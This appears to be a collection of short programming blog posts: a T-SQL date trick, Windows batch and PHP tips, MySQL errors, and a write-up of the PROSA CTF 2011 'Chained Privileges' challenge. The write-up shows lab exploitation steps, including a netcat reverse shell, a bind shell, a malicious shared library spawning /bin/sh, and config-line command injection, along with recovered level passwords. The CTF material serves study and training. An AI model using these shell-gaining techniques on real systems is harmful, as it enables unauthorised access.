Create date for next september in T-SQL
Microsoft SQL Server 2008 R2 has no function to build a date from its parts. One option is to assign a string such as '2012-05-01' to a datetime field, but the resulting datetime then depends on the current language or DATEFORMAT setting. A locale-independent way to construct the date '2012-09-01' is the expression DATEADD(MONTH, (2012-1900)*12+(9-1), 1-1): datetime zero (1-1) is 1900-01-01, and adding whole months to it always lands on the first of a month. To select the first of next September, the year part has to depend on the current date. Adding 4 months to the current date gives a date whose year is the current year if today is before September, and next year if it is already September or later. Thus, DATEADD(MONTH, (YEAR(DATEADD(MONTH,4,GETDATE()))-1900)*12+(9-1), 1-1) yields the first of next September.
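The expression above, as an added example that is not part of the original post: it is evaluated against fixed sample dates instead of GETDATE() so the year rollover is visible, and it is generalised from September to any month number held in a variable @target_month (the offset 13 - @target_month reduces to the post's 4 months for September).

```sql
-- Added example (not from the original post): the post's expression run against
-- constructed sample dates, plus a generalised form for any target month.
DECLARE @target_month INT = 9;            -- 9 = September, as in the post
DECLARE @offset INT = 13 - @target_month; -- months to add so the year part is right (4 for September)

-- Sample "current dates" (constructed for this example). The unseparated
-- YYYYMMDD literal is not affected by SET LANGUAGE or SET DATEFORMAT.
DECLARE @samples TABLE (today DATETIME);
INSERT INTO @samples (today) VALUES
    ('20120115'),   -- before September: expect 2012-09-01
    ('20120831'),   -- last day of August: expect 2012-09-01
    ('20120901'),   -- already September: expect 2013-09-01
    ('20121231');   -- December: expect 2013-09-01

SELECT
    today,
    -- The post's expression with GETDATE() replaced by the sample date.
    -- 0 is the same datetime zero (1900-01-01) as the post's 1-1.
    DATEADD(MONTH, (YEAR(DATEADD(MONTH, 4, today)) - 1900) * 12 + (9 - 1), 0)
        AS next_september,
    -- Same idea for an arbitrary month: DATEADD(MONTH, n, 0) counts months
    -- from 1900-01-01, so n = (year - 1900) * 12 + (month - 1).
    DATEADD(MONTH, (YEAR(DATEADD(MONTH, @offset, today)) - 1900) * 12
                   + (@target_month - 1), 0)
        AS next_target_month
FROM @samples;
```

On SQL Server 2012 and later, DATEFROMPARTS(year, month, day) does the construction directly; the month-counting trick is what remains for 2008 R2.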
Chained Privileges
Challenge from PROSA CTF 2011
level00
$ gdb level01
(gdb) disas main
Dump of assembler code for function main:
0x00000000004004f4 <+0>: push rbp
0x00000000004004f5 <+1>: mov rbp,rsp
0x00000000004004f8 <+4>: sub rsp,0x10
0x00000000004004fc <+8>: mov DWORD PTR [rbp-0x4],edi
0x00000000004004ff <+11>: mov QWORD PTR [rbp-0x10],rsi
0x0000000000400503 <+15>: cmp DWORD PTR [rbp-0x4],0x1
0x0000000000400507 <+19>: jle 0x40051c <main+40>
0x0000000000400509 <+21>: mov rax,QWORD PTR [rbp-0x10]
0x000000000040050d <+25>: add rax,0x8
0x0000000000400511 <+29>: mov rax,QWORD PTR [rax]
0x0000000000400514 <+32>: mov rdi,rax
0x0000000000400517 <+35>: call 0x400400 <system@plt>
0x000000000040051c <+40>: mov eax,0x0
0x0000000000400521 <+45>: leave
0x0000000000400522 <+46>: ret
End of assembler dump.
This one simply calls system(argv[1]) if argc > 1, so ./level01 "cat level01.txt" leads to next level.
level01
If at least one argument is supplied to the program, the first argument is compared against the string stored at address 0x4006a9, and on a match the program calls execve("/bin/sh", ["/bin/sh"], 0). (gdb) x/s 0x4006a9 reveals that the magic argument is fam4p894jgajg4h23.
$ ./level02 fam4p894jgajg4h23
bash-4.2$ cat level02.txt
u5oey7VKvsSnPGu3zF
level02
This one creates a socket to the address and port given as arguments 1 and 2 respectively, overwrites stdin, stdout and stderr with the socket, and then executes /bin/sh. So first set netcat up to listen on a port, nc.traditional -vv -l -p 1337, in another host/session, and then call ./level03 127.0.0.1 1337. Now fetch the password for the next level from the netcat session:
$ nc.traditional -vv -l -p 1337
listening on [any] 1337 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 59019
cat level03.txt
puUcxcVHFdc4mUcF8G
level03
This one is similar to the previous level, except that it binds a shell to the host and port supplied in the program arguments. So this time we run ./level04 127.0.0.1 1337 and connect to it from another session:
$ nc 127.0.0.1 1337
cat level04.txt
1oaJV4LNozqWAxzpgB
level04
This one calls dlopen(argv[1]) and then calls the function “mystery_function” from the loaded shared library. So let's make a library with this function and load it.
$ cd /tmp/
$ cat win.c
#include <stdlib.h>
void mystery_function() {
system("/bin/sh");
}
$ gcc -c -fPIC win.c -o win.o
$ gcc -shared -Wl,-soname,libwin.so.1 -o libwin.so.1.0.1 win.o
$ cd
$ ./level05 /tmp/libwin.so.1.0.1
$ cat level05.txt
bfnX60jzsiAU5XvNhJ
level05
This time the file argv[1] is read line by line. Each line is split at the character ‘=’ into A and B. Then a function trim is applied first to B and then to A, and handle(A,B) is called. Disassembling handle reveals that a call rdx is made, so let's take a closer look. The function does something like this:
if (A[0] != '#') {
    for (i = 0; i <= 1; i++) {
        if (strcmp(A, 0x601080+((i*3) << 3)) {
            // do more
        }
    }
}
So are these strings? For the two possible values of i, A is compared to either (gdb) x/s 0x601080: "please_print" or (gdb) x/s 0x601080+24: "please_do". Check whether please_do executes commands:
$ echo "please_do=/bin/sh" > /tmp/6.txt
$ ./level06 /tmp/6.txt
$ cat level06.txt
UwvKom36jC2hhh2K0G
level06
This time the program takes two arguments A and B, a long integer and an integer. It installs the function a as the handler for the SIGSEGV signal. It then calls the function recursive, which decrements B until it is zero and then calls the address given in A. So if A is not a valid function pointer, this indeed leads to a segmentation fault.
The function a checks whether the difference between two addresses lies between 1000 and 1099. Break on the comparison against 0x3e8 and run with different inputs, remembering to continue past the first segmentation fault. You will quickly see that the difference depends on the number of recursions.
$ for i in {0..100}; do ./level07 100 $i; done
$ cat level07.txt
8Svej8aJShJJN069o3
Localhost Slow on Windows 7
I had some trouble figuring out why http://localhost was responding slowly compared to 127.0.0.1 when accessing my local Apache HTTP server. It turned out that by default the hosts file contains the following line:
# 127.0.0.1 localhost
Uncomment this line by removing the hash, so that it reads:
127.0.0.1 localhost
No DNS look-up is then performed before localhost is resolved to 127.0.0.1.
Read output from VBS in CMD scripts
Here is a sample VB script, test.vbs:
wscript.echo "Testoutput"
wscript.echo "This is a test"
And here is a batch script that runs it and keeps the last line it prints in the variable myvar:
@echo off
FOR /F "usebackq delims=" %%i IN (`cscript test.vbs`) DO Set myvar=%%i
echo Script result = "%myvar%"
Get date in Windows CMD script
How the date command and the %DATE% environment variable are formatted depends on the Windows installation language. So here is a very ugly hack to get a timestamp of the form YYYYMMDDHHiiss in a Windows batch script, independent of the system locale settings:
@echo off
FOR /F "usebackq tokens=1-10 delims=+|NOW():- " %%a IN (`mysql -e "SELECT NOW();" -u root -ptest`) DO set datetime=%%a%%b%%c%%d%%e%%f
echo %datetime%
Notice that this requires MySQL. If you do not want to put your MySQL root password in a script, you can create a new user with absolutely no rights granted.
But again, this solution is stupid; I hope you will never need it or use it. I just thought I would share it, since it was driving my co-worker crazy, and we ended up using it to name a MySQL dump.
Add or remove magic quotes in PHP
When you write a PHP script without knowing how PHP is configured on the server that will execute it, you cannot know whether to add or strip slashes from GET and POST data. Notice that the $_FILES array is not affected by magic quotes.
Warning: one should handle slashes on keys also, not only values. See first comment.
Here is a script that strips away magic quotes, if they were added:
<?php
// Only strip if the server actually added the slashes (magic_quotes_gpc=On).
if(get_magic_quotes_gpc()) {
    // Recurse into nested arrays; stripslashes() only handles scalar values.
    // Note: this only processes values, not array keys (see the warning above).
    function undo_magic_quotes($array) {
        return is_array($array) ? array_map('undo_magic_quotes', $array) : stripslashes($array);
    }
    $_GET = undo_magic_quotes($_GET);
    $_POST = undo_magic_quotes($_POST);
    $_COOKIE = undo_magic_quotes($_COOKIE);
    $_REQUEST = undo_magic_quotes($_REQUEST);
}
?>
And likewise, here is a script that adds magic quotes, if they were not already applied:
Force pure HTML editor in WordPress
After installing WordPress for this blog, I realized that I was forced to use the stupid TinyMCE WYSIWYG editor. I smiled when I found out that I was able to set an HTML-editor-only flag in my account settings. But this did not turn the editor into a pure HTML editor, since every line I wrote was replaced by <p>{the_line}</p>, which is not practical when you want to paste programming code.
Here is how you disable this unacceptable behavior the easy way (WP kindly asks you to find a plugin that undoes the paragraphs, but you know…).
Select count from multiple tables
Sometimes a parent table has more than one child table with multiple references to a field in the parent table. The question is then how to count the references from more than one table in a single query. I have found 5 different ways to achieve this result, and therefore I have run a few tests to see which was better.
To test this I made a small PHP script that creates a parent table and child tables. A loop then populates the tables with 1,000 parent rows, approximately 15 children of type 1 and approximately 75 children of type 2 per parent. This is done before each query, to make sure that all queries run under the same conditions.
Foreign keys and MySQL (errno: 150)
Today I tried to execute the SQL
mysql> ALTER TABLE parent_child ADD FOREIGN KEY (parent_id) REFERENCES parent(id) ON DELETE CASCADE;
in MySQL, and got the error
Can't create table 'db.#sql-aa1_1' (errno: 150)
I tried to look up error number 150 on the internet, but found many reasons why error no. 150 could occur; none of them was my case. Common mistakes that cause this error are:
Only a few short .dk domains left
Hello world! This blog is simply named 5p, because it was one of the few domains left with fewer than three characters. I chose 5p among these, since p can stand for many good things, for example: Professionalism, Problem solving, Planning, Procedures or Performance. There are actually 3,205 different words that start with the letter p in the Danish language, without conjugations.
Actually 5p was the only one left out of 6 domains. Unfortunately it is not easy to search for domain names, so to reach this conclusion I made what some might call a “dictionary attack” on the .dk registry: I simply generated all combinations of Danish domain names with 2 characters and looked them up with a small PHP script executed from a cmd prompt. The other 5 domains left were (notice that the first two start with a zero, not the letter o):